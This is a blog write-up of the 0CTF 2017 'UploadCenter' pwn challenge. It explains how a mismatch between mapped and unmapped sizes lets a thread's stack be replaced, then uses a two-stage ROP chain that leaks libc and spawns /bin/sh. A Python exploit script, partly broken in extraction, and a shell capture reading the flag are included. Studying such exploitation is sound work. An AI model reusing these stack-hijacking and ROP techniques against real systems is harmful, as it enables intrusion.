Monday, March 20, 2017

0CTF 2017 - UploadCenter (PWN 523)

Welcome to another Menu Chall right~
Here you can use any function as you wish
No more words , Let't begin
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File

UploadCenter was a small service (x86-64, Linux) that allowed you to upload PNG files and do nothing with them. Well, that's not entirely true - you could list them (it would show you their width/height and depth), remove them and spawn two kinds of threads (one would inform you about any new uploads - i.e. when you would upload a file it would tell you that you've uploaded a file; and the second one would just list all the files in a different thread).

The PNGs themselves were kept on a linked list, where each node would contain (in short) some basic information about the PNG, a pointer to mmap'ed memory where the PNG was placed, and the size of said mmap'ed memory area.

The critical parts of the task were related to three menu options: 2 (upload), 4 (delete) and 6 (monitor), so I'll focus on them.

Starting with the most boring one, 4 :) Delete File function removed the specified PNG from the linked list, unmapped the memory chunk and freed all the structures (PNG descriptor, list node). As far as I'm concerned it was correctly implemented and for the sake of this write up the most interesting part was the munmap call:

        munmap(i->mmap_addr, i->mmap_size);

Going to the next function, 6 :) Monitor File spawned a new thread, which (in an infinite loop) waited for a condition to be met (new file uploaded) and displayed a message. It basically boiled down to the following code:

  while ( !pthread_mutex_lock(&mutex) )
    while ( !ev_file_added )
      pthread_cond_wait(&cond, &mutex);
    puts("New file uploaded, Please check");

And the last, and most important part, was the 2 :) Upload and parse File function, which worked in the following way:

  1. It asked the user for a 32-bit word containing data size (limited at 1 MB).
  2. And then received that many bytes from the user.
  3. Then inflated (i.e. zlib decompressed) the data (limited at 32 MB).
  4. And did some simplistic PNG format parsing (which, apart from the width and height, could basically be ignored).
  5. After that it mmap'ed an area of size width * height (important!) and copied that amount of decompressed data there.
  6. And then it set entry->mmap_size to the size of decompressed data (so there was a mismatch between what was mapped,and what would be unmapped when deleting).

So actually what you could do (using functions 2 and 4) is unmap an adjacent area of memory to one of the PNG areas. But how to get code execution from that?

At this moment I would like to recommend this awesome blogpost (kudos to mak for handing me a link during the CTF):

The method I used is exactly what is described there, i.e.:

  1. I've allocated two 8 MB areas (i.e. uploaded two PNGs), where one area was described correctly as 8 MB and the other incorrectly as 16 MB block, 
  2. I've freed the correctly allocated one (i.e. deleted it from the list).
  3. And then I used option 6 to launch a new thread. The stack of the new thread was placed exactly in the place of the PNG I just unmapped.
  4. And then I've unmapped the second PNG, which actually unmapped the stack of the new thread as well (these areas were next to each over). Since the thread was waiting for a mutex it didn't crash.
  5. At that moment it was enough to upload a new 8 MB PNG that contained the "new stack" (with ROP chain + some minor additions) for the new thread (upload itself would wake the thread) and the woken thread would eventually grab a return address from the now-controlled-by-us stack leading to code execution.
At that point my stage 1 ROP leaked libc address (using puts to leak its address from .got table) and fetched stage 2 of ROP, which run execve with /bin/sh. This was actually a little more tricky since the new thread and the main thread were racing to read data from stdin, which made part of my exploit always end up in the wrong place (and this misaligned the stack_) - but its nothing that cannot be fixed with running the exploit a couple of times.

And that's it. Full exploit code is available at the end of the post (I kept the nasty bits - i.e. debugging code, etc - in there for educational reasons... I guess).

 | |||||||||   `--------'     |          O
     / XXXXXX /'|       /'
    / XXXXXX /  `    /'
   / XXXXXX /`-------'
  / XXXXXX /
(________(        007 James Bond
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
ls -la
total 84
drwxr-xr-x  22 root root  4096 Mar  9 11:42 .
drwxr-xr-x  22 root root  4096 Mar  9 11:42 ..
drwxr-xr-x   2 root root  4096 Mar  9 11:45 bin
drwxr-xr-x   3 root root  4096 Mar  9 11:48 boot
drwxr-xr-x  17 root root  2980 Mar  9 13:10 dev
drwxr-xr-x  85 root root  4096 Mar 19 14:12 etc
drwxr-xr-x   3 root root  4096 Mar 18 17:49 home
lrwxrwxrwx   1 root root    31 Mar  9 11:42 initrd.img -> /boot/initrd.img-3.16.0-4-amd64
drwxr-xr-x  14 root root  4096 Mar  9 11:43 lib
drwxr-xr-x   2 root root  4096 Mar  9 11:41 lib64
drwx------   2 root root 16384 Mar  9 11:40 lost+found
drwxr-xr-x   3 root root  4096 Mar  9 11:40 media
drwxr-xr-x   2 root root  4096 Mar  9 11:41 mnt
drwxr-xr-x   2 root root  4096 Mar  9 11:41 opt
dr-xr-xr-x 112 root root     0 Mar  9 13:10 proc
drwx------   4 root root  4096 Mar 19 14:12 root
drwxr-xr-x  17 root root   680 Mar 19 14:07 run
drwxr-xr-x   2 root root  4096 Mar  9 11:49 sbin
drwxr-xr-x   2 root root  4096 Mar  9 11:41 srv
dr-xr-xr-x  13 root root     0 Mar 17 21:12 sys
drwx-wx-wt   7 root root  4096 Mar 20 05:17 tmp
drwxr-xr-x  10 root root  4096 Mar  9 11:41 usr
drwxr-xr-x  11 root root  4096 Mar  9 11:41 var
lrwxrwxrwx   1 root root    27 Mar  9 11:42 vmlinuz -> boot/vmlinuz-3.16.0-4-amd64
cat /home/*/flag

The exploit (you'll probably have to run it a couple of times):

import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d        
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def upload_file(s, fname):
  with open(fname, "rb") as f:
    d =

  return upload_string(s, d)

def png_header(magic, data):
  return ''.join([
    pack(">I", len(data)),
    pack(">I", 0x41414141),  # CRC    

def make_png(w, h):
  return ''.join([
    "89504E470D0A1A0A".decode("hex"),  # Magic
        w, h, 8, 2, 0, 0, 0  # 24-bit RGB
    png_header("IDAT", ""),
    png_header("IEND", ""),

def upload_png(s, w, h, final_sz, padding="", pbyte="A"):
  png = make_png(w, h)
  while len(png) % 8 != 0:
    png += "\0"
  png += padding
  print len(png), final_sz
  png = png.ljust(final_sz, pbyte)
  png = png.encode("zlib")

  if len(png) > 1048576:
    print "!!!!!!! ZLIB: %i vs %i" % (len(png), 1048576)

  print s.recvuntil(MENU_LAST_LINE)

def upload_string(s, d):
  z = d.encode("zlib")

def upload_file_padded(s, fname, padding):
  with open(fname, "rb") as f:
    d =

  return upload_string(s, d + padding)

MENU_LAST_LINE = "6 :) Monitor File\n"
READ_INFO_LAST_LINE = "enjoy your tour\n"

def del_entry(s, n):
  s.sendall(str(n) + "\n")
  print s.recvuntil(MENU_LAST_LINE)

def spawn_monitor(s):
  print s.recvuntil(MENU_LAST_LINE)

def set_rdi(v):
  # 0x4038b1    pop rdi
  # 0x4038b2    ret
  return ''.join([

def set_rsi_r15(rsi=0, r15=0):
  # 0x4038af    pop rsi
  # 0x4038b0    pop r15
  # 0x4038b2    ret
  return ''.join([

def call_puts(addr):
  # 0400AF0
  return ''.join([

def call_read_bytes(addr, sz):
  # 400F14
  return ''.join([

def stack_pivot(addr):
  # 0x402ede    pop rsp
  # 0x402edf    pop r13
  # 0x402ee1    ret
  return ''.join([
    dq(addr - 8)

def call_sleep(tm):
  return ''.join([

def go():  
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  # Put your code here!

  print s.recvuntil(MENU_LAST_LINE)

  #s.sendall("A" * 20)
  #print s.recvuntil(READ_INFO_LAST_LINE)

  #s.sendall("B" * 1)  # 2, 8
  #d = s.recvuntil(READ_INFO_LAST_LINE)
  #print d
  #sth = d.split(" , enjoy your tour")[0].split("Welcome Team ")[1]
  #print sth.encode("hex")

  upload_png(s, 10, 10, 0x1000)

  upload_png(s, 1, 8392704, 8392704) # 1
  upload_png(s, 1, 8392704, 8392704 + 8392704)
  del_entry(s, 1)


  del_entry(s, 1)
  # Now we hope that not all threads run.

  padding = []
  for i in range((8392704 - 128) / 8):  # ~1mln
    if i < 900000:
      padding.append(dq(0x4141414100000000 | i))

  padding[0xfffd9] = dq(0x0060E400)
  padding[0xfffda] = dq(0x0060E400)

  del padding[0xfffdd:]

  VER = 0x4098DC
  VER_STR = "1.2.8\n"

  CMD = "/bin/sh\0"
  #CMD = CMD.ljust(64, "\0")

  rop = ''.join([
    call_read_bytes(0x0060E400, 512 + len(CMD)),

  padding = ''.join(padding)

  #print "press enter to trigger"
  print "\x1b[1;33mTriggering!\x1b[m"
  upload_png(s, 1, 8392704, 8392704, padding)

  puts_libc = ''
  for x in s.recvuntil(VER_STR).splitlines():
    if len(x) == 0:
      puts_libc += "\0"
      puts_libc += x[0]
    if len(puts_libc) == 8:

  puts_libc = rq(puts_libc)
  LIBC = puts_libc - 0x06B990
  print "LIBC: %x" % LIBC

  rop2 = ''.join([
    #dq(0x402ee1) * 16,  # nopsled
    dq(0x401363) * 16,
    set_rsi_r15(0x0060EF00, 0),
    set_rdi(0x0060E400 + 512),
    dq(LIBC+0xBA310), # execve

  rop2 = rop2.ljust(512, "\0")
  rop2 += CMD * 16

  s.sendall("PPPPPPPP" + rop2 + (" " * 16))

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s

  # Python console.
  # Note: you might need to modify ReceiverClass if you want
  #       to parse incoming packets.
  #dct = locals()
  #for k in globals().keys():
  #  if k not in dct:
  #    dct[k] = globals()[k]


HOST = ''
PORT = 12345
#HOST = ''
#HOST = ''
#PORT = 1234


  1. Nice write-up !
    Question: Couldn't you have unmapped the stack and remapped with new PNG containing the execve shellcode instead of racing with the main thread for stdin ?

    1. Thanks! :)
      So what I didn't write above (and probably should have) is that the mmapped area was RW-, so execution was not possible on the PNG pages (and NX was enabled). Therefore I had to fallback to the usual methods (i.e. ROP).

      The racing could have been avoided if I would know libc address before preparing stage 1 ROP (so I could use execve function call or syscall gadgets). I could know it since there was a small stack leak in option 1, but I decided to ignore it and leak libc in stage one, and then do the race.

      The race was rather simple btw - according to my measurements the main thread won the race for stdin read about 4-10 times before the controlled thread would win it. Each time the main thread won the race it grabbed 1 byte from stdin, therefore 4-10 bytes were missing each time. Given that I used an additional alignment in my shellcode (so it could be 'eaten off' by the main thread) it boiled down to hitting the correct number of races won by main thread. My bet was on 8, 16 or any other product of 8, since that was that was the size of my ROP nop sled (i.e. if one item of the nopsled would be correctly 'eaten off', the rest of the shellcode would execute).
      So the theoretical probability of this happening was bout 1/7, and in practice I hit in in 2-3 try (after I got my stage 2 working locally that is).

      In the end the race wasn't a big problem. It just had to be accounted for :)

    2. One thing to add:

      - the main thread did read(1) on stdin
      - the controlled thread did read(controlled size, probably limited to TCP window size cross kernel buffering done during thread being asleep) on stdin

      So after the controlled thread won the race, the main thread stopped being a problem instantly (i.e. the rest of the stage 2 payload from that point on was read correctly).